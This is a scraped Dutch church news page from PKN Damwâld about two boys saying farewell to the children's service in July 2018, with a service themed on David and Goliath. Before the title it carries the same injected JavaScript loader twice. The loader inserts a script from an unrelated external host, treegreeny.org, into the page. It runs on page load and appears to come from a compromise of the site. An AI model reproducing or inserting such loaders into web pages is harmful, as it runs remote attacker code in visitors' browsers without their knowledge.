;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Afscheid groep 8 kindernevendienst - PKN Damwâld

Afscheid groep 8 kindernevendienst

Gepubliceerd op: maandag 16 juli 2018

Afgelopen zondagochtend 15 juli namen weer een aantal kinderen uit groep 8 afscheid van de kindernevendienst. Dit jaar waren het twee jongens, Mark Cuperus en Yorrick Zuidema. Samen met Robert Colijn was een dienst voorbereid met als Thema:

Je hoeft niet Groot te zijn om GROOT te worden.

Aan de hand van een 5-tal, door de jongens zelf gemaakte, filmpjes en het verhaal van David welke de reus Goliath verslaat, werd het thema verder uitgediept. God is de aller grootste van deze wereld. Als je op Hem vertrouwd zal hij altijd achter jou staan en je helpen.

Samen met de eigen band Sign werden bij dit thema passende liederen gezongen, waaronder het geweldige nieuwe opwekkingslied 807, God van Licht.

Afsluitend kregen Mark en Yorrick elk de ‘Bijbel in Gewone Taal’ overhandigd.